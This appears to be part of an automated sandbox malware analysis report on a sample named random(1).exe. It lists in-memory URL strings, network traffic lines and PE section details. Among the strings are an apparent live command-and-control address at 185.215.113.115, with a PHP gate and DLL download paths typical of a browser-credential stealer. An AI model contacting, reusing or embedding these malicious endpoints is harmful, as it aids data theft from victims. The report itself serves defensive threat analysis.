              Source: random(1).exe, 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll=
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll.
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll;
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllc
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlln
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/Y
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php%0
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJ
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpC
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpO
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpR0
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpW
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phper
              Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpp
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprowser
              Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpve
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
              Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115y
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: chromecache_168.3.drString found in binary or memory: http://www.broofa.com
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028492455.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_166.3.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_166.3.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chromecache_168.3.dr, chromecache_166.3.drString found in binary or memory: https://apis.google.com
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_166.3.drString found in binary or memory: https://clients6.google.com
              Source: chromecache_166.3.drString found in binary or memory: https://content.googleapis.com
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chromecache_166.3.drString found in binary or memory: https://domains.google.com/suggest/flow
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_168.3.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_168.3.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_168.3.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_168.3.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
              Source: chromecache_168.3.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_166.3.drString found in binary or memory: https://plus.google.com
              Source: chromecache_166.3.drString found in binary or memory: https://plus.googleapis.com
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://support.mozilla.org
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, random(1).exe, 00000000.00000003.1895386152.000000000556E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, random(1).exe, 00000000.00000003.1895386152.000000000556E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
              Source: chromecache_166.3.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_166.3.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_166.3.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chromecache_168.3.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_168.3.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_168.3.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/----JKECGHCFIJDAAKFHJJDHst.exe
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/BAKFCAAKFCFC
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lXy50eHQ=host.exe
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: random(1).exe, 00000000.00000003.1982796865.000000000B8E0000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/eads:
              Source: random(1).exe, 00000000.00000003.1982796865.000000000B8E0000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: random(1).exeStatic PE information: section name:
              Source: random(1).exeStatic PE information: section name: .idata
              Source: random(1).exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,0_2_6C6B62C0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C53AC600_2_6C53AC60
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60AC300_2_6C60AC30
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5F6C000_2_6C5F6C00
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C58ECD00_2_6C58ECD0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C52ECC00_2_6C52ECC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5FED700_2_6C5FED70
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C65AD500_2_6C65AD50
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B8D200_2_6C6B8D20
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6BCDC00_2_6C6BCDC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C6D900_2_6C5C6D90
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C534DB00_2_6C534DB0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5CEE700_2_6C5CEE70
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C610E200_2_6C610E20
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C53AEC00_2_6C53AEC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5D0EC00_2_6C5D0EC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5B6E900_2_6C5B6E90
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C59EF400_2_6C59EF40
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5F2F700_2_6C5F2F70
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C536F100_2_6C536F10
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C670F200_2_6C670F20
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60EFF00_2_6C60EFF0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C530FE00_2_6C530FE0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C678FB00_2_6C678FB0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C53EFB00_2_6C53EFB0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6048400_2_6C604840
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5808200_2_6C580820
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5BA8200_2_6C5BA820
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6368E00_2_6C6368E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5689600_2_6C568960
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5869000_2_6C586900
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C64C9E00_2_6C64C9E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5649F00_2_6C5649F0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5F09B00_2_6C5F09B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C09A00_2_6C5C09A0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5EA9A00_2_6C5EA9A0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5ACA700_2_6C5ACA70
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5DEA000_2_6C5DEA00
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E8A300_2_6C5E8A30
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5AEA800_2_6C5AEA80
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C636BE00_2_6C636BE0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5D0BA00_2_6C5D0BA0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5484600_2_6C548460
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5BA4300_2_6C5BA430
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5944200_2_6C594420
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5764D00_2_6C5764D0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5CA4D00_2_6C5CA4D0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C65A4800_2_6C65A480
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5885400_2_6C588540
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6345400_2_6C634540
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5D05700_2_6C5D0570
